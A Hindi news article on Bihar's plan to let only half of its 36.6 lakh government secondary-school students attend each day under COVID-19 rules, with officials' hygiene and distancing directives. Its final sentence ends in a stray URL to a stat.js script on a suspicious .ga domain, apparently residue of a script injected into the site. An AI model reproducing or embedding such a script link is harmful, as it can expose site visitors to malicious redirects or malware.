#

बिहार विद्यार्थियों के लिए खुशखबरी – आ सकेंगे जल्द ही स्कूल 18 लाख विद्यार्थी जाने कब से खुलेंगे यह स्कूल ?

 

 

 

बिहार,( कुलसूम फात्मा ) पूरे देश में कोरोना महामारी फैलने के कारण आर्थिक व्यवस्था तो बिगड़ ही गई थी। इसके साथ ही महामारी और ना पहले इसलिए सभी चीजों पर पाबंदी लगाने के साथ-साथ स्कूलों को भी बंद कर दिया गया था। लंबे समय के पश्चात जब स्कूल को खोला गया तो कोरोना महामारी के कारण कुछ नियम बनाए गए, जिसमें सोशियल डिस्टेंस तथा अन्य के साथ साथ कितने विद्यार्थी स्कूल 1 दिन में आएंगे, निश्चित किया गया

 

बता दें कि बिहार में तकरीबन 8,000 सरकारी माध्यमिक तथा उच्च माध्यमिक स्कूलों में 1 दिन में ज्यादा से ज्यादा 18 लाख 30 हजार 971 विद्यार्थी ही आ सकेंगे और यह नियम सोमवार से लागू कर दिया जाएगा। उपर्युक्त स्कूलों में टोटल 36 लाख 61 हजार 942 बच्चे हैं।
वर्तमान समय में कोरोना महामारी के कारण 1 दिन में केवल आधे ही बच्चे आ पाएंगे।

 

 

 

कोरोना महामारी के कारण 14 मार्च 2020 से राज्य के सरकारी स्कूल तथा कोचिंग और कॉलेज के साथ-साथ शिक्षण संस्थान को बंद कर दिया गया था। जबकि 23 सितंबर से नवि तथा बारहवीं तक के स्कूल 33% उपस्थिति के साथ-साथ कक्षाओं को खोला भी जा चुका है। 30 दिसंबर को वीडियो कॉन्फ्रेसिंग की मीटिंग में शिक्षा विभाग के प्रधान सचिव संजय कुमार ने सभी डिस्ट्रिक्ट तथा शिक्षा पदाधिकारियों के साथ मीटिंग में स्पष्ट कर दिया की सरकारी स्कूलों में नवी तथा बारहवीं तक के अध्ययन 18 ,03 709 छात्र तथा 18 58 233 छात्रों में से आधे ही 1 दिन में विद्यालय आएंगे।

 

 

 

उन्होंने स्कूल की कक्षाओं को सैनेटाइज के साथ-साथ बच्चों में सोशल डिस्टेंसिंग के भी निर्देश दिए भीड़ जमा ना हो इस बात से अवगत कराया जाए। और बच्चों को भीड़ से परहेज करने के भी निर्देश दिए हाथ धोने तथा साबुन की व्यवस्था स्कूल में रखी जाए। हर बच्चे को दो-दो मास्क प्रदान किए जाएं निर्देश दिए ,

 

 

 

स्कूलों को नगर निगम की सहायता से कक्षाओं को सेनेटाइज़ किया जाए। अगर इसमें कोई दिक्कत आती है तो विद्यालय के फंड से राशि की व्यवस्था की जाए।  शिक्षा विभाग को डिस्ट्रिक्ट से जो रिपोर्ट मिली उसके अनुसार स्कूलों को चलाने से संबंधित सभी तैयारियां पूर्ण कर ली गई हैं। शनिवार के दिन विभाग के प्रवक्ता तथा माध्यमिक शिक्षा उप निदेशक अमित कुमार ने बताया की सभी स्कूल सितंबर की 23 से कार्यात्मकहै। शिक्षक पर-डे आ रहे हैं और शौचालय तथा पीने वाले पानी के साथ-साथ बाकी व्यवस्थाओं को भी सही किया जा चुका है।

 

 

 

इसलिए किसी भी तरीके की स्कूल खुलने के पश्चात दिक्कत नहीं होगी। बस बच्चों को एक स्थान पर अधिक संख्या में जमा नहीं रहने दिया जाएगा इस बात पर नजर रखी जानी चाहिए और उनको इस बात की आदत डलवानी है की वह एक साथ एक स्थान पर ज्यादा संख्या में इकट्ठा न हो , कोचिंग कॉलेज के साथ साथ बाकी शिक्षण संस्थानों को भी चलाने से संबंधित गाइडलाइन को फॉलो कराना पड़ेगा। सरकार के गाइड लाइन के पालन की पूरी जिम्मेदारी जिलाअधिकारियों को दे दी गई है। जिला शिक्षा पदाधिकारी उनका इस कार्य में पूर्ण रुप से सहायता करेंगे।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published. Required fields are marked *